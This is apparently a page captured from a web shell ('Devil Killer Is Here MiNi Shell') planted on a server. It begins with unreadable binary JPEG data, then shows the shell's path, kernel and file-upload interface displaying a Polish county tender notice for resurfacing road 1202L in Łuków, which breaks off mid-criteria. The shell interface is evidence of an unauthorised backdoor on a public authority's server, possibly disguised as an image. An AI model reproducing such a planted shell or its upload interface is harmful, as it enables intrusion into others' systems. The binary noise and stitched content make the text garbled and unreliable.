JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20241024/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20241024/0056252801-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont drogi powiatowej nr 1202L Łuków ul. Wójtostwo </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIAT ŁUKOWSKI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 711581825</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Józefa Piłsudskiego 17</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łuków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">21-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL815 - Puławski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">kancelaria@starostwolukow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.powiatlukowski.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Zarząd Dróg Powiatowych</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">711586627</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Łapiguz 112</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Łuków</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">21-400</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL815 - Puławski</span></h3> <h3 class="mb-0">1.11.9.) Numer telefonu: <span class="normal">25 798 2020</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">biuro@zdp.lukow.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">http://www.zdp.lukow.pl/</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont drogi powiatowej nr 1202L Łuków ul. Wójtostwo </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d1e669cb-404a-41d7-836f-8eae2b1824d7</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00562528</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-10-24</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2024/BZP 00025184/08/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.9 Remont drogi powiatowej nr 1202L Łuków ul. Wójtostwo</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zdplukow.ezamawiajacy.pl/pn/zdplukow/demand/180219/notice/public/details <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">Postępowanie prowadzone jest przy użyciu środków komunikacji elektronicznej.<br/> Składanie ofert, wymiana informacji oraz przekazywanie dokumentów i oświadczeń między Zamawiającym a Wykonawcą odbywa<br/> się z wykorzystaniem platformy zakupowej e-Zamawiający pod adresem:<br/> https://zdplukow.ezamawiajacy.pl/pn/zdplukow/demand/180219/notice/public/details</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. W przedmiotowym postępowaniu,<br/> zgodnie z art. 61 ust. 1 ustawy Pzp, składanie ofert, wszelkich dokumentów, wniosków i oświadczeń oraz wymiana informacji między<br/> Zamawiającym a Wykonawcą odbywa się za pomocą środków komunikacji elektronicznej w rozumieniu ustawy z dnia 18 lipca 2002<br/> r. o świadczeniu usług drogą elektroniczną (Dz.U. z 2020 r. poz 344 ze zm.). <br/>2. Komunikacja między Zamawiającym a Wykonawcami, w tym składanie ofert, oświadczenia Wykonawców, pełnomocnictwa,<br/> podmiotowe środki dowodowe, zobowiązania podmiotów trzecich, przekazywane są w postaci elektronicznej, w ogólnie dostępnych<br/> formatach danych, tj. w szczególności: pdf, docx, doc, odt, rtf, txt, pod rygorem nieważności w formie elektronicznej lub w postaci<br/> elektronicznej opatrzonej podpisem zaufanym lub podpisem elektronicznym. <br/>3. W przedmiotowym postępowaniu Zamawiający dopuszcza możliwość przekazywania sobie przez strony postępowania<br/> oświadczeń, wniosków, zawiadomień oraz informacji za pośrednictwem Platformy znajdującej się pod adresem:<br/> https://zdplukow.ezamawiajacy.pl/pn/zdplukow/demand/180219/notice/public/details<br/><br/> w zakładce „Korespondencja”.<br/> 4. Oświadczenia, wnioski, zawiadomienia lub informacje, które wpłyną do Zamawiającego, uważa się za dokumenty złożone w<br/> terminie, jeśli ich czytelna treść dotrze do Zamawiającego przed upływem tego terminu. Za datę wpływu oświadczeń, wniosków,<br/> zawiadomień oraz informacji przyjmuje się datę ich złożenia/wysłania na Platformie.<br/> 5. Ogólne zasady korzystania z Platformy:<br/> 1) Zgłoszenie do postępowania wymaga zalogowania Wykonawcy do Systemu na subdomenie https://zdplukow.ezamawiajacy.pl lub<br/> https://oneplace.marketplanet.pl <br/>2) Wykonawca po wybraniu opcji „przystąp do postępowania” zostanie przekierowany do strony https://oneplace.marketplanet.pl,<br/> gdzie zostanie powiadomiony o możliwości zalogowania lub do założenia bezpłatnego konta. Wykonawca zakłada konto wykonując<br/> kroki procesu rejestracyjnego; podaje adres e-mail, ustanawia hasło, następnie powtarza hasło, wpisuje kod z obrazka, akceptuje<br/> regulamin, klika polecenie „zarejestruj się”. <br/>3) Rejestracja Wykonawcy trwa maksymalnie do 2 dni roboczych. W związku z tym Zamawiający zaleca Wykonawcom<br/> uwzględnienie czasu niezbędnego na rejestrację w procesie złożenia Oferty w postaci elektronicznej. <br/>Wykonawca wraz z potwierdzeniem złożenia wniosku rejestracyjnego otrzyma informacje, o możliwości przyspieszenia procedury<br/> założenia konta, wówczas należy skontaktować się pod numerem telefonu podanym w ww. potwierdzeniu. <br/>4) Po założeniu konta Wykonawca ma możliwość złożenia Oferty w postępowaniu. Komunikacja między Zamawiającym a<br/> Wykonawcami, w szczególności zawiadomienia oraz informacje, przekazywane są w formie elektronicznej za pośrednictwem<br/> Platformy Zakupowej. Za datę przekazania zaświadczeń oraz informacji przyjmuje się datę ich wysłania za pośrednictwem zakładki „Korespondencja”. 6. Wykonawca może zwrócić się do Zamawiającego o wyjaśnienie treści SWZ. Wniosek należy przesłać za<br/> pośrednictwem<br/> Platformy Zakupowej przez opcję „zadaj pytanie lub przy użyciu zakładki „Korespondencja”: w celu zadania pytania Zamawiającemu,<br/> Wykonawca klika lewym przyciskiem myszy klawisz ZADAJ PYTANIE. Powoduje to otwarcie okna, w którym należy uzupełnić dane<br/> Wykonawcy, temat i treść/przedmiot pytania, po wypełnieniu wskazanych pól wraz z wymaganym kodem weryfikującym z obrazka<br/> Wykonawca klika klawisz POTWIERDŹ, wykonawca uzyskuje potwierdzenie wysłania pytania poprzez komunikat systemowy<br/> &#34;pytanie wysłane&#34;. <br/>Z uwagi na ograniczoną ilość znaków możliwych do wprowadzenia pełny opis wymagań technicznych i organizacyjnych dotyczących<br/> korespondencji elektronicznej został zawarty w Rozdz. X i XI SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1. Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady <br/>(UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych <br/>w związku z przetwarzaniem danych osobowych i w sprawie swobodnego <br/>przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne <br/>rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), <br/>dalej „RODO”, informuję, że: <br/>1) Administratorem Pani/Pana danych osobowych jest Zarząd Dróg <br/>Powiatowych w Łukowie, ul. Łapiguz 112, 21-400 Łuków; <br/>2) Inspektorem Ochrony Danych jest Magdalena Piszcz - Jóźwiak, z którym <br/>można się skontaktować pod adresem e-mail: iod@starostwolukow.pl. lub tel. <br/>25 798 22 03 wew. 210. <br/>3) Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. <br/>c RODO w celu związanym z postępowaniem o udzielenie zamówienia <br/>publicznego pod nazwą: „Remont drogi powiatowej nr 1202L Łuków <br/>ul. Wójtostwo&#34;, znak postępowania AZ.262.27.2024; <br/>4) odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym <br/>udostępniona zostanie dokumentacja postępowania w oparciu o art. 74 ustawy <br/>Prawo zamówień publicznych, zwanej dalej „ustawa Pzp”; <br/>5) Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 <br/>ustawy Pzp, przez okres 4 lat od dnia zakończenia postępowania o <br/>udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, <br/>okres przechowywania obejmuje cały czas trwania umowy; <br/>6) obowiązek podania przez Panią/Pana danych osobowych bezpośrednio <br/>Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach <br/>ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia <br/>publicznego; konsekwencje niepodania określonych danych wynikają z ustawy <br/>Pzp; <br/>7) w odniesieniu do Pani/Pana danych osobowych decyzje nie będą <br/>podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO; <br/>8) posiada Pani/Pan: <br/>a) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana <br/>dotyczących (w przypadku, gdy skorzystanie z tego prawa wymagałoby po <br/>stronie administratora niewspółmiernie dużego wysiłku może zostać <br/>Pani/Pan zobowiązana do wskazania dodatkowych informacji mających na <br/>celu sprecyzowanie żądania, w szczególności podania nazwy lub daty <br/>postępowania o udzielenie zamówienia publicznego lub konkursu albo <br/>sprecyzowanie nazwy lub daty zakończonego postępowania o udzielenie <br/>zamówienia); <br/>b) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych <br/>osobowych (skorzystanie z prawa do sprostowania nie może skutkować <br/>zmianą wyniku postępowania o udzielenie zamówienia publicznego ani <br/>zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie <br/>może naruszać integralności protokołu oraz jego załączników); <br/>c) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia <br/>przetwarzania danych osobowych z zastrzeżeniem przypadków, o których <br/>mowa w art. 18 ust. 2 RODO prawo żądania od administratora ograniczenia <br/>przetwarzania danych osobowych z zastrzeżeniem okresu trwania <br/>postępowania o udzielenie zamówienia publicznego lub konkursów oraz <br/>przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia <br/>przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w <br/>celu zapewnienia korzystania ze środków ochrony prawnej lub w celu <br/>ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa <br/>członkowskiego); <br/>d) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, <br/>gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana <br/>dotyczących narusza przepisy RODO; <br/><br/>--- Z uwagi na ograniczoną ilość znaków możliwych do wprowadzenia kompletna klauzula informacyjna RODO dostępna jest w Rozdz.<br/> XX SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">AZ.262.27.2024</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1. Przedmiotem zamówienia jest wykonanie robót budowlanych związanych <br/>z remontem drogi powiatowej nr 1202L Łuków (ul. Wójtostwo, ul. Zapowiednik) – Strzyżew – Olszewnica – Polskowola – Kąkolewnica, w KM 1+000 – 1+480 <br/>w m. Łuków, ul. Wójtostwo <br/> <br/>2. Przedmiot zamówienia obejmuje remont nawierzchni drogi na odcinku <br/>480 m, w zakresie: - frezowania nawierzchni o średniej grubości 5 cm; - wykonania połączenia międzywarstwowego; - wykonania warstwy ścieralnej z mieszanki AC 11S 50/70, KR3-4 o grubości <br/>po zagęszczeniu 4 cm; - regulacja pionowa urządzeń infrastruktury technicznej; - oznakowania poziomego jezdni. <br/> <br/>3. Szczegółowy opis przedmiotu zamówienia określają: <br/>- Dokumentacja projektowa wraz z przedmiarem robót - załącznik nr 9 do <br/>SWZ - Specyfikacja techniczna wykonania i odbioru robót budowlanych - załącznik <br/>nr 10 do SWZ <br/> <br/>Nomenklatura Wspólnego Słownika Zamówień: <br/> <br/>45200000-9 Roboty budowlane w zakresie wznoszenia kompletnych obiektów <br/>budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i <br/>wodnej <br/> <br/>45230000-8 Roboty budowlane w zakresie budowy rurociągów, linii <br/>komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i <br/>kolei; wyrównywanie terenu <br/> <br/>45231000-5 Roboty budowlane w zakresie budowy rurociągów, ciągów <br/>komunikacyjnych i linii energetycznych <br/> <br/>4. Jeżeli Zamawiający w opisie przedmiotu zamówienia wskazał znaki towarowe, <br/>patenty lub pochodzenia, źródła lub szczególny proces, który charakteryzuje <br/>produkty lub usługi dostarczane przez konkretnego wykonawcę, dopuszcza się <br/>zaoferowanie rozwiązań równoważnych, pod warunkiem zachowania przez nie <br/>takich samych minimalnych parametrów technicznych, jakościowych oraz <br/>funkcjonalnych itp. Podane w dokumentach zamówienia parametry należy w takim <br/>przypadku traktować jako minimalne. <br/> <br/>4.1 Wykonawca, który powołuje się na rozwiązania równoważne, jest obowiązany <br/>wykazać, że oferowane przez niego rozwiązanie spełnia wymagania określone <br/>przez zamawiającego. W takim przypadku, Wykonawca załącza do oferty wykaz <br/>rozwiązań równoważnych wraz z jego opisem lub normami. <br/> <br/>4.2 W przypadku, gdy w opisie przedmiotu zamówienia znajdą się odniesienia do <br/>norm, ocen technicznych, specyfikacji technicznych i systemów referencji <br/>technicznych, o których mowa w art. 101 ust. 1 pkt 2 oraz ust. 3 ustawy Pzp, <br/>Zamawiający dopuszcza rozwiązania równoważne. <br/> <br/>4.3 Ewentualne wskazane przez Zamawiającego w SWZ nazwy własne, znaki <br/>towarowe, patenty i miejsce pochodzenia są uzasadnione specyfiką przedmiotu <br/>zamówienia i mają na celu wskazanie jedynie jakości i parametrów przedmiotu <br/>zamówienia z uwagi na brak innych dostatecznie dokładnych określeń, które <br/>pozwalałyby opisać przedmiot zamówienia w tej części w sposób jednoznaczny i <br/>wyczerpujący. <br/> <br/>4.4 Zgodnie z art. 101 ust. 5 Ustawy „Wykonawca, który powołuje się na <br/>rozwiązania równoważne opisywanym przez zamawiającego, jest obowiązany <br/>wykazać, że „proponowane rozwiązania w równoważnym stopniu spełniają <br/>wymagania określone w opisie przedmiotu zamówienia” pod względem norm, ocen <br/>technicznych, specyfikacji technicznych i systemów referencji technicznych. <br/> <br/>5. Na wykonane w ramach przedmiotu zamówienia roboty budowlane Wykonawca <br/>udzieli minimum 60 miesięcznej rękojmi, licząc od dnia zakończenia czynności <br/>odbioru zadania (podpisania protokołu odbioru końcowego). <br/><br/>6. Zamawiający nie przewiduje możliwości udzielenia dotychczasowemu <br/>wykonawcy zamówień na podstawie art. 214 ust. 1 pkt 7 ustawy Pzp polegającego <br/>na powtórzeniu podobnych usług lub robót budowlanych. <br/> <br/>7. Zgodnie z art. 131 ust. 2 pkt 1 ustawy Pzp, zamawiający przewiduje możliwość <br/>odbycia przez Wykonawcę wizji lokalnej przed upływem terminu składania ofert. <br/>Wizja lokalna możliwa jest do dokonania po wcześniejszym uzgodnieniu terminu <br/>jej odbycia, w dniach roboczych tj. poniedziałek-piątek w godz. 7:00 – 15:00. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45200000-9 - Roboty budowlane w zakresie wznoszenia kompletnych obiektów budowlanych lub ich części oraz roboty w zakresie inżynierii lądowej i wodnej</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45230000-8 - Roboty budowlane w zakresie budowy rurociągów, linii komunikacyjnych i elektroenergetycznych, autostrad, dróg, lotnisk i kolei; wyrównywanie terenu</p> <p class="mb-0">45231000-5 - Roboty budowlane w zakresie budowy rurociągów, ciągów komunikacyjnych i linii energetycznych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">21 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">1. Zamawiający dokona oceny ofert na podstawie niżej przedstawionych kryteriów oceny ofert:<br/> 1) „Cena brutto” – waga kryterium: 60 %<br/> Punkty w kryterium „Cena brutto” zostaną przyznane według wzoru:<br/> KC=CN/COB x 60 (max liczba punktów w ocenianej pozycji)<br/> Gdzie:<br/> KC - ilość punktów przyznanych Wykonawcy;<br/> CN - najniższa zaoferowana cena brutto, spośród wszystkich ofert nie podlegających odrzuceniu;<br/> COB - cena brutto zaoferowana w ofercie badanej.<br/> Uwaga: powyższy iloraz zostanie zaokrąglony do dwóch miejsc po przecinku.<br/> Zaokrąglenie będzie polegało na:- odrzuceniu wszystkich cyfr końcowych danej liczby znajdujących się powyżej drugiego miejsca po przecinku,- zwiększeniu ostatniej z pozostałych cyfr o jeden, jeżeli trzecia cyfra po przecinku liczby pierwotnej była większa lub<br/> równa 5.<br/> Maksymalna łączna liczba punktów możliwych do uzyskania w ocenianym kryterium KC wynosi 60 punktów. Podstawą przyznania<br/> punktów w kryterium „Cena brutto” będzie cena ofertowa brutto podana przez Wykonawcę w Formularzu ofertowym.<br/><br/>2) Punkty w kryterium „Rękojmia” (R) zostaną przyznane według następującej <br/>reguły: - Wykonawca w formularzu ofertowym zadeklaruje okres na jaki udzieli <br/>rękojmi na wykonane przez siebie roboty budowlane. <br/>Oferta z oferowanym 60-miesięcznym terminem rękojmi otrzyma 0 pkt; <br/>Oferta z oferowanym 66-miesięcznym terminem rękojmi otrzyma 10 pkt;<br/>Oferta z oferowanym 72-miesięcznym terminem rękojmi otrzyma 20 pkt. <br/>Oferta z oferowanym 78-miesięcznym terminem rękojmi otrzyma 30 pkt. <br/>Oferta z oferowanym 84-miesięcznym terminem rękojmi otrzyma 40 pkt. <br/>Jeżeli wykonawca wskaże okres rękojmi dłuższy niż 84 miesiące, do oceny <br/>ofert zostanie przyjęty okres 84 miesięczny i taki też zostanie uwzględniony <br/>w umowie. <br/>Maksymalna liczba punktów jakie przyzna Zamawiający w ocenianym <br/>kryterium R wynosi 40 punktów. <br/> <br/>2. Za najkorzystniejszą uznana zostanie oferta, która uzyska najwyższą łączną <br/>liczbę punktów obliczoną według wzoru: NO = KC + R</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) 